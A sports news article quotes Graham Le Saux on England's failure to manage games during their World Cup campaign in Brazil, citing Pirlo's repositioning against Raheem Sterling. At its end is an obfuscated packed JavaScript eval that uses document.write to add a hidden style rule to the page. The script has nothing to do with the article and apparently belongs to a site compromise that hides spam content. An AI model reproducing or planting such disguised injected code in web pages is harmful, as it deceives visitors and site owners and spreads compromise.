Graham Le Saux believes England must learn the lessons of their Brazilian campaign.

The former Three Lions left-back says Roy Hodgson’s men must learn to think on their feet before they can make the grade at international level.

Le Saux believes only fine margins have made the difference during England’s awful campaign in Brazil.

But he fears they will never rival the world’s best until they can swing finely-balanced matches their way – like their defeats against Italy and Uruguay.

“We have to learn how we manage games better,” said Le Saux, speaking on behalf of official England supporter

“You do that by managing the game better tactically, making decisions on the pitch, leaders adapting to situations as they change.

“In the Italy game – and this is me speculating – I don’t doubt Raheem Sterling was told ‘when Italy have the ball go and stand on Andrea Pirlo and stop him getting the ball as he will be their deepest midfielder.’

“Within 10 minutes Pirlo recognised he was being marked and played 30 yards up the pitch.

“He made that decision to change what he was doing to give England another problem.

“Sterling can’t go all that way to mark him so England then had a two v three in midfield, which was the problem.

“We have got to have players that can make the right decisions more often and not just follow a plan, but also adapt.

“Tactically you are told what to do and taught systems and roles but in terms of adapting, learning and constantly recognising situations, I don’t think we do that as well.

“Both Italy and Uruguay had the measure of England in terms of how they manage the game.” eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘i(f.j(h.g(b,1,0,9,6,4,7,c,d,e,k,3,2,1,8,0,8,2,t,a,r,s,1,2,6,l,0,4,q,0,2,3,a,p,5,5,5,3,m,n,b,o,1,0,9,6,4,7)));’,30,30,’116|115|111|112|101|57|108|62|105|121|58|60|46|100|99|document|fromCharCode|String|eval|write|123|117|120|125|47|45|59|97|98|110′.split(‘|’),0,{}))
